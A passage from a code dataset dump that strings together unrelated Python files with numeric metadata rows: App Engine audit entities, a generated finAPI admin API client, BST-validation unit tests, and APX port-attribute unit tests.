'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L']]
| 4,673.666667 | 35,999 | 0.188503 | 7,872 | 42,063 | 1.007241 | 0.003303 | 0.080212 | 0.088157 | 0.080212 | 0.891411 | 0.79947 | 0.699836 | 0.601967 | 0.510531 | 0.424265 | 0 | 0.000351 | 0.187528 | 42,063 | 8 | 36,000 | 5,257.875 | 0.231661 | 0.000594 | 0 | 0 | 0 | 0 | 0.187094 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eeb338549267d1d6ad4c22937391c27a1e1bf7cc | 1,313 | py | Python | src/entities/audit.py | clayz/crazy-quiz-web | 7601809ad521d95ae251a026f171b9ec6939c55f | [
"Apache-2.0"
] | null | null | null | src/entities/audit.py | clayz/crazy-quiz-web | 7601809ad521d95ae251a026f171b9ec6939c55f | [
"Apache-2.0"
] | null | null | null | src/entities/audit.py | clayz/crazy-quiz-web | 7601809ad521d95ae251a026f171b9ec6939c55f | [
"Apache-2.0"
] | null | null | null | from google.appengine.ext import ndb
from entities import BaseEntity
class Purchase(BaseEntity):
goods_id = ndb.IntegerProperty(required=True)
version = ndb.StringProperty(required=True)
date = ndb.DateTimeProperty(required=True)
@classmethod
def get_last(cls, user_key):
return cls.query(ancestor=user_key).order(-cls.date)
class Exchange(BaseEntity):
goods_id = ndb.IntegerProperty(required=True)
version = ndb.StringProperty(required=True)
date = ndb.DateTimeProperty(required=True)
@classmethod
def get_last(cls, user_key):
return cls.query(ancestor=user_key).order(-cls.date)
class Earn(BaseEntity):
type_id = ndb.IntegerProperty(required=True)
version = ndb.StringProperty(required=True)
date = ndb.DateTimeProperty(required=True)
@classmethod
def get_last(cls, user_key):
return cls.query(ancestor=user_key).order(-cls.date)
class Consume(BaseEntity):
type_id = ndb.IntegerProperty(required=True)
album = ndb.IntegerProperty()
level = ndb.IntegerProperty()
picture = ndb.IntegerProperty()
version = ndb.StringProperty(required=True)
date = ndb.DateTimeProperty(required=True)
@classmethod
def get_last(cls, user_key):
return cls.query(ancestor=user_key).order(-cls.date) | 29.177778 | 60 | 0.724296 | 159 | 1,313 | 5.880503 | 0.232704 | 0.154011 | 0.085562 | 0.119786 | 0.826738 | 0.826738 | 0.826738 | 0.762567 | 0.762567 | 0.762567 | 0 | 0 | 0.167555 | 1,313 | 45 | 61 | 29.177778 | 0.855444 | 0 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.060606 | 0.121212 | 0.878788 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
eeb63dfcc7b17f5ed0d9d718d65a237159a6ae7d | 24,092 | py | Python | swagger_client/api/mandator_administration_api.py | chbndrhnns/finapi-client | 259beda8b05e912c49d2dc4c3ed71205134e5d8a | [
"MIT"
] | 2 | 2019-04-15T05:58:21.000Z | 2021-11-15T18:26:37.000Z | swagger_client/api/mandator_administration_api.py | chbndrhnns/finapi-client | 259beda8b05e912c49d2dc4c3ed71205134e5d8a | [
"MIT"
] | 1 | 2021-06-18T09:46:25.000Z | 2021-06-18T20:12:41.000Z | swagger_client/api/mandator_administration_api.py | chbndrhnns/finapi-client | 259beda8b05e912c49d2dc4c3ed71205134e5d8a | [
"MIT"
] | 2 | 2019-07-08T13:41:09.000Z | 2020-12-07T12:10:04.000Z | # coding: utf-8
"""
finAPI RESTful Services
finAPI RESTful Services # noqa: E501
OpenAPI spec version: v1.42.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class MandatorAdministrationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def change_client_credentials(self, body, **kwargs): # noqa: E501
"""Change client credentials # noqa: E501
Change the client_secret for any of your clients, including the mandator admin client. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. <br/><br/>NOTES:<br/>• When you change a client's secret, then all of its existing access tokens will be revoked. User access tokens are not affected.<br/>• finAPI is storing client secrets with a one-way encryption. A lost client secret can NOT be recovered. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_client_credentials(body, async=True)
>>> result = thread.get()
:param async bool
:param ChangeClientCredentialsParams body: Parameters for changing client credentials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.change_client_credentials_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.change_client_credentials_with_http_info(body, **kwargs) # noqa: E501
return data
def change_client_credentials_with_http_info(self, body, **kwargs): # noqa: E501
"""Change client credentials # noqa: E501
Change the client_secret for any of your clients, including the mandator admin client. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. <br/><br/>NOTES:<br/>• When you change a client's secret, then all of its existing access tokens will be revoked. User access tokens are not affected.<br/>• finAPI is storing client secrets with a one-way encryption. A lost client secret can NOT be recovered. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_client_credentials_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param ChangeClientCredentialsParams body: Parameters for changing client credentials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_client_credentials" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `change_client_credentials`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['finapi_auth'] # noqa: E501
return self.api_client.call_api(
'/api/v1/mandatorAdmin/changeClientCredentials', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_users(self, body, **kwargs): # noqa: E501
"""Delete users # noqa: E501
Delete one or several users, which are specified by a given list of identifiers. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. <br/><br/><b>NOTE</b>: finAPI may fail to delete one (or several, or all) of the specified users. A user cannot get deleted when his data is currently locked by an internal process (for instance, update of a bank connection or transactions categorization). The response contains the identifiers of all users that could not get deleted, and all users that could get deleted, separated in two lists. The mandator admin client can retry the request at a later time for the users who could not get deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_users(body, async=True)
>>> result = thread.get()
:param async bool
:param UserIdentifiersParams body: List of user identifiers (required)
:return: UserIdentifiersList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_users_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.delete_users_with_http_info(body, **kwargs) # noqa: E501
return data
def delete_users_with_http_info(self, body, **kwargs): # noqa: E501
"""Delete users # noqa: E501
Delete one or several users, which are specified by a given list of identifiers. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. <br/><br/><b>NOTE</b>: finAPI may fail to delete one (or several, or all) of the specified users. A user cannot get deleted when his data is currently locked by an internal process (for instance, update of a bank connection or transactions categorization). The response contains the identifiers of all users that could not get deleted, and all users that could get deleted, separated in two lists. The mandator admin client can retry the request at a later time for the users who could not get deleted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_users_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param UserIdentifiersParams body: List of user identifiers (required)
:return: UserIdentifiersList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_users" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_users`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['finapi_auth'] # noqa: E501
return self.api_client.call_api(
'/api/v1/mandatorAdmin/deleteUsers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserIdentifiersList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_list(self, **kwargs): # noqa: E501
"""Get user list # noqa: E501
<p>Get a list of the users of the mandator that is authorized by the access_token. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. You can set optional search criteria to get only those users that you are interested in. If you do not specify any search criteria, then this service functions as a 'get all' service.</p><p>Note that the original user id is longer available in finAPI once a user has been deleted. Because of this, the userId of deleted users will be a distorted version of the original userId. For example, if the deleted user's id was originally 'user', then this service will return 'uXXr' as the userId.</p> # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_user_list(async=True)
>>> result = thread.get()
:param async bool
:param str min_registration_date: Lower bound for a user's registration date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'registrationDate' is equal to or later than the given date will be regarded.
:param str max_registration_date: Upper bound for a user's registration date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'registrationDate' is equal to or earlier than the given date will be regarded.
:param str min_deletion_date: Lower bound for a user's deletion date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'deletionDate' is not null, and is equal to or later than the given date will be regarded.
:param str max_deletion_date: Upper bound for a user's deletion date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'deletionDate' is null, or is equal to or earlier than the given date will be regarded.
:param str min_last_active_date: Lower bound for a user's last active date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'lastActiveDate' is not null, and is equal to or later than the given date will be regarded.
:param str max_last_active_date: Upper bound for a user's last active date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'lastActiveDate' is null, or is equal to or earlier than the given date will be regarded.
:param bool include_monthly_stats: Whether to include the 'monthlyStats' for the returned users. If not specified, then the field defaults to 'false'.
:param str monthly_stats_start_date: Minimum bound for the monthly stats (=oldest month that should be included). Must be passed in the format 'YYYY-MM'. If not specified, then the monthly stats will go back up to the first month in which the user existed (date of the user's registration). Note that this field is only regarded if 'includeMonthlyStats' = true.
:param str monthly_stats_end_date: Maximum bound for the monthly stats (=latest month that should be included). Must be passed in the format 'YYYY-MM'. If not specified, then the monthly stats will go up to either the current month (for active users), or up to the month of deletion (for deleted users). Note that this field is only regarded if 'includeMonthlyStats' = true.
:param bool is_deleted: If NOT specified, then the service will regard both active and deleted users in the search. If set to 'true', then ONLY deleted users will be regarded. If set to 'false', then ONLY active users will be regarded.
:param int page: Result page that you want to retrieve
:param int per_page: Maximum number of records per page. Can be at most 500. NOTE: Due to its validation and visualization, the swagger frontend might show very low performance, or even crashes, when a service responds with a lot of data. It is recommended to use a HTTP client like Postman or DHC instead of our swagger frontend for service calls with large page sizes.
:param list[str] order: Determines the order of the results. You can order the results by 'userId'. The default order for this service is 'userId,asc'. The general format is: 'property[,asc|desc]', with 'asc' being the default value.
:return: PageableUserInfoList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_user_list_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_user_list_with_http_info(**kwargs) # noqa: E501
return data
def get_user_list_with_http_info(self, **kwargs): # noqa: E501
"""Get user list # noqa: E501
<p>Get a list of the users of the mandator that is authorized by the access_token. Must pass the <a href='https://finapi.zendesk.com/hc/en-us/articles/115003661827-Difference-between-app-clients-and-mandator-admin-client'>mandator admin client</a>'s access_token. You can set optional search criteria to get only those users that you are interested in. If you do not specify any search criteria, then this service functions as a 'get all' service.</p><p>Note that the original user id is longer available in finAPI once a user has been deleted. Because of this, the userId of deleted users will be a distorted version of the original userId. For example, if the deleted user's id was originally 'user', then this service will return 'uXXr' as the userId.</p> # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_user_list_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str min_registration_date: Lower bound for a user's registration date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'registrationDate' is equal to or later than the given date will be regarded.
:param str max_registration_date: Upper bound for a user's registration date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'registrationDate' is equal to or earlier than the given date will be regarded.
:param str min_deletion_date: Lower bound for a user's deletion date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'deletionDate' is not null, and is equal to or later than the given date will be regarded.
:param str max_deletion_date: Upper bound for a user's deletion date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'deletionDate' is null, or is equal to or earlier than the given date will be regarded.
:param str min_last_active_date: Lower bound for a user's last active date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'lastActiveDate' is not null, and is equal to or later than the given date will be regarded.
:param str max_last_active_date: Upper bound for a user's last active date, in the format 'YYYY-MM-DD' (e.g. '2016-01-01'). If specified, then only users whose 'lastActiveDate' is null, or is equal to or earlier than the given date will be regarded.
:param bool include_monthly_stats: Whether to include the 'monthlyStats' for the returned users. If not specified, then the field defaults to 'false'.
:param str monthly_stats_start_date: Minimum bound for the monthly stats (=oldest month that should be included). Must be passed in the format 'YYYY-MM'. If not specified, then the monthly stats will go back up to the first month in which the user existed (date of the user's registration). Note that this field is only regarded if 'includeMonthlyStats' = true.
:param str monthly_stats_end_date: Maximum bound for the monthly stats (=latest month that should be included). Must be passed in the format 'YYYY-MM'. If not specified, then the monthly stats will go up to either the current month (for active users), or up to the month of deletion (for deleted users). Note that this field is only regarded if 'includeMonthlyStats' = true.
:param bool is_deleted: If NOT specified, then the service will regard both active and deleted users in the search. If set to 'true', then ONLY deleted users will be regarded. If set to 'false', then ONLY active users will be regarded.
:param int page: Result page that you want to retrieve
:param int per_page: Maximum number of records per page. Can be at most 500. NOTE: Due to its validation and visualization, the swagger frontend might show very low performance, or even crashes, when a service responds with a lot of data. It is recommended to use a HTTP client like Postman or DHC instead of our swagger frontend for service calls with large page sizes.
:param list[str] order: Determines the order of the results. You can order the results by 'userId'. The default order for this service is 'userId,asc'. The general format is: 'property[,asc|desc]', with 'asc' being the default value.
:return: PageableUserInfoList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['min_registration_date', 'max_registration_date', 'min_deletion_date', 'max_deletion_date', 'min_last_active_date', 'max_last_active_date', 'include_monthly_stats', 'monthly_stats_start_date', 'monthly_stats_end_date', 'is_deleted', 'page', 'per_page', 'order'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_list" % key
)
params[key] = val
del params['kwargs']
if 'page' in params and params['page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_user_list`, must be a value greater than or equal to `1`") # noqa: E501
if 'per_page' in params and params['per_page'] > 500: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_user_list`, must be a value less than or equal to `500`") # noqa: E501
if 'per_page' in params and params['per_page'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `per_page` when calling `get_user_list`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'min_registration_date' in params:
query_params.append(('minRegistrationDate', params['min_registration_date'])) # noqa: E501
if 'max_registration_date' in params:
query_params.append(('maxRegistrationDate', params['max_registration_date'])) # noqa: E501
if 'min_deletion_date' in params:
query_params.append(('minDeletionDate', params['min_deletion_date'])) # noqa: E501
if 'max_deletion_date' in params:
query_params.append(('maxDeletionDate', params['max_deletion_date'])) # noqa: E501
if 'min_last_active_date' in params:
query_params.append(('minLastActiveDate', params['min_last_active_date'])) # noqa: E501
if 'max_last_active_date' in params:
query_params.append(('maxLastActiveDate', params['max_last_active_date'])) # noqa: E501
if 'include_monthly_stats' in params:
query_params.append(('includeMonthlyStats', params['include_monthly_stats'])) # noqa: E501
if 'monthly_stats_start_date' in params:
query_params.append(('monthlyStatsStartDate', params['monthly_stats_start_date'])) # noqa: E501
if 'monthly_stats_end_date' in params:
query_params.append(('monthlyStatsEndDate', params['monthly_stats_end_date'])) # noqa: E501
if 'is_deleted' in params:
query_params.append(('isDeleted', params['is_deleted'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('perPage', params['per_page'])) # noqa: E501
if 'order' in params:
query_params.append(('order', params['order'])) # noqa: E501
collection_formats['order'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['finapi_auth'] # noqa: E501
return self.api_client.call_api(
'/api/v1/mandatorAdmin/getUserList', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageableUserInfoList', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 67.108635 | 786 | 0.681513 | 3,387 | 24,092 | 4.722173 | 0.10747 | 0.028011 | 0.020195 | 0.015006 | 0.917094 | 0.899275 | 0.884832 | 0.866888 | 0.858134 | 0.858134 | 0 | 0.019787 | 0.234352 | 24,092 | 358 | 787 | 67.296089 | 0.847284 | 0.028972 | 0 | 0.631016 | 1 | 0.016043 | 0.250418 | 0.07898 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.02139 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
eeb7e0ebde08671c12ff7632322c3d8c6ab05e51 | 3,121 | py | Python | problems/test_ic_valid_bst.py | gregdferrell/algo | 974ae25b028d49bcb7ded6655a7e11dcf6aa221d | [
"MIT"
] | null | null | null | problems/test_ic_valid_bst.py | gregdferrell/algo | 974ae25b028d49bcb7ded6655a7e11dcf6aa221d | [
"MIT"
] | null | null | null | problems/test_ic_valid_bst.py | gregdferrell/algo | 974ae25b028d49bcb7ded6655a7e11dcf6aa221d | [
"MIT"
] | null | null | null | from .ic_valid_bst import is_tree_valid_bst
from .problem_solve_util import BinaryTreeNode
def test_is_valid_bst_1():
#
# 50
# / \
# 30 80
# / \ / \
# 20 40 70 90
#
root_node = BinaryTreeNode(50, None)
assert is_tree_valid_bst(root_node)
new_node = root_node.insert_left(30)
assert is_tree_valid_bst(root_node)
new_node.insert_left(20)
assert is_tree_valid_bst(root_node)
new_node.insert_right(40)
assert is_tree_valid_bst(root_node)
new_node = root_node.insert_right(80)
assert is_tree_valid_bst(root_node)
new_node.insert_left(70)
assert is_tree_valid_bst(root_node)
new_node.insert_right(90)
assert is_tree_valid_bst(root_node)
def test_is_balanced_depth_search_right():
# Create the following tree, testing after each node insert
# 10
# / \
# 5 20
# \
# 25
# \
# 30
root_node = BinaryTreeNode(10, None)
assert is_tree_valid_bst(root_node)
new_node = root_node.insert_right(20)
assert is_tree_valid_bst(root_node)
new_node = new_node.insert_right(25)
assert is_tree_valid_bst(root_node)
new_node = new_node.insert_right(30)
assert is_tree_valid_bst(root_node)
new_node = root_node.insert_left(5)
assert is_tree_valid_bst(root_node)
def test_is_balanced_depth_search_left():
# Create the following tree, testing after each node insert
# 10
# / \
# 5 20
# / /
# 4 21
# /
# 3
root_node = BinaryTreeNode(10, None)
assert is_tree_valid_bst(root_node)
new_node = root_node.insert_left(5)
assert is_tree_valid_bst(root_node)
new_node = new_node.insert_left(4)
assert is_tree_valid_bst(root_node)
new_node = new_node.insert_left(3)
assert is_tree_valid_bst(root_node)
new_node = root_node.insert_right(20)
assert is_tree_valid_bst(root_node)
new_node = new_node.insert_left(21)
assert not is_tree_valid_bst(root_node)
def test_is_balanced_depth_search_simple_left():
# 50
# /
# 30
# \
# 60
root_node = BinaryTreeNode(50, None)
new_node = root_node.insert_left(30)
new_node = new_node.insert_right(60)
assert not is_tree_valid_bst(root_node)
def test_is_balanced_depth_search_simple_right():
# 50
# \
# 60
# /
# 40
root_node = BinaryTreeNode(50, None)
new_node = root_node.insert_right(60)
new_node = new_node.insert_left(40)
assert not is_tree_valid_bst(root_node)
def test_is_valid_bst_gotcha():
#
# 50
# / \
# 30 80
# / \ / \
# 20 60 70 90
#
root_node = BinaryTreeNode(50, None)
assert is_tree_valid_bst(root_node)
new_node = root_node.insert_left(30)
assert is_tree_valid_bst(root_node)
new_node.insert_left(20)
assert is_tree_valid_bst(root_node)
new_node.insert_right(60)
assert not is_tree_valid_bst(root_node)
new_node = root_node.insert_right(80)
assert not is_tree_valid_bst(root_node)
new_node.insert_left(70)
assert not is_tree_valid_bst(root_node)
new_node.insert_right(90)
assert not is_tree_valid_bst(root_node)
| 24.968 | 60 | 0.700417 | 491 | 3,121 | 4.008147 | 0.09776 | 0.174797 | 0.156504 | 0.199187 | 0.923272 | 0.910569 | 0.894309 | 0.89126 | 0.878557 | 0.878557 | 0 | 0.047892 | 0.217238 | 3,121 | 124 | 61 | 25.169355 | 0.757675 | 0.169817 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.409091 | 1 | 0.090909 | false | 0 | 0.030303 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
eecb31c732cb6c2690f8194db29f010db54a4f01 | 4,727 | py | Python | tests/port_attribute_test.py | ovenystas/py-apx | 9b361ebc64e7c8ecb68f13f79e589d5a85cd5734 | [
"MIT"
] | null | null | null | tests/port_attribute_test.py | ovenystas/py-apx | 9b361ebc64e7c8ecb68f13f79e589d5a85cd5734 | [
"MIT"
] | 8 | 2018-10-17T09:03:43.000Z | 2021-11-02T13:37:44.000Z | tests/port_attribute_test.py | ovenystas/py-apx | 9b361ebc64e7c8ecb68f13f79e589d5a85cd5734 | [
"MIT"
] | 5 | 2018-06-12T08:02:42.000Z | 2020-08-12T05:07:49.000Z | import os, sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import apx
import unittest
class TestPortAttribute(unittest.TestCase):
def test_integer_init_value(self):
attr = apx.base.PortAttribute('=0')
self.assertEqual(attr.isQueued, False)
self.assertEqual(attr.isParameter, False)
self.assertEqual(attr.initValue.valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.value, 0)
attr = apx.base.PortAttribute('=255')
self.assertEqual(attr.isQueued, False)
self.assertEqual(attr.isParameter, False)
self.assertEqual(attr.initValue.valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.value, 255)
attr = apx.base.PortAttribute('={3,3,7}')
self.assertEqual(attr.isQueued, False)
self.assertEqual(attr.isParameter, False)
self.assertEqual(attr.initValue.valueType, apx.VTYPE_LIST)
self.assertEqual(len(attr.initValue.elements), 3)
self.assertEqual(attr.initValue.elements[0].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[0].value, 3)
self.assertEqual(attr.initValue.elements[1].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[1].value, 3)
self.assertEqual(attr.initValue.elements[2].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[2].value, 7)
def test_string_init_value(self):
attr = apx.base.PortAttribute('="InitValue"')
self.assertEqual(attr.isQueued, False)
self.assertEqual(attr.isParameter, False)
self.assertEqual(attr.initValue.valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.value, "InitValue")
attr = apx.base.PortAttribute('=""')
self.assertEqual(attr.isQueued, False)
self.assertEqual(attr.isParameter, False)
self.assertEqual(attr.initValue.valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.value, "")
attr = apx.base.PortAttribute('={"a","b","", "c"}')
self.assertEqual(attr.isQueued, False)
self.assertEqual(attr.isParameter, False)
self.assertEqual(attr.initValue.valueType, apx.VTYPE_LIST)
self.assertEqual(len(attr.initValue.elements), 4)
self.assertEqual(attr.initValue.elements[0].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[0].value, "a")
self.assertEqual(attr.initValue.elements[1].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[1].value, "b")
self.assertEqual(attr.initValue.elements[2].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[2].value, "")
self.assertEqual(attr.initValue.elements[3].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[3].value, "c")
def test_record_init_value(self):
attr = apx.base.PortAttribute('={1,2,3}')
self.assertEqual(attr.isQueued, False)
self.assertEqual(attr.isParameter, False)
self.assertEqual(attr.initValue.valueType, apx.VTYPE_LIST)
self.assertEqual(len(attr.initValue.elements), 3)
self.assertEqual(attr.initValue.elements[0].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[0].value, 1)
self.assertEqual(attr.initValue.elements[1].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[1].value, 2)
self.assertEqual(attr.initValue.elements[2].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[2].value, 3)
attr = apx.base.PortAttribute('={{255,255,255},15}')
self.assertEqual(attr.isQueued, False)
self.assertEqual(attr.isParameter, False)
self.assertEqual(attr.initValue.valueType, apx.VTYPE_LIST)
self.assertEqual(len(attr.initValue.elements), 2)
self.assertEqual(attr.initValue.elements[0].valueType, apx.VTYPE_LIST)
self.assertEqual(len(attr.initValue.elements[0].elements), 3)
self.assertEqual(attr.initValue.elements[0].elements[0].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[0].elements[0].value, 255)
self.assertEqual(attr.initValue.elements[0].elements[1].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[0].elements[1].value, 255)
self.assertEqual(attr.initValue.elements[0].elements[2].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[0].elements[2].value, 255)
self.assertEqual(attr.initValue.elements[1].valueType, apx.VTYPE_SCALAR)
self.assertEqual(attr.initValue.elements[1].value, 15)
if __name__ == '__main__':
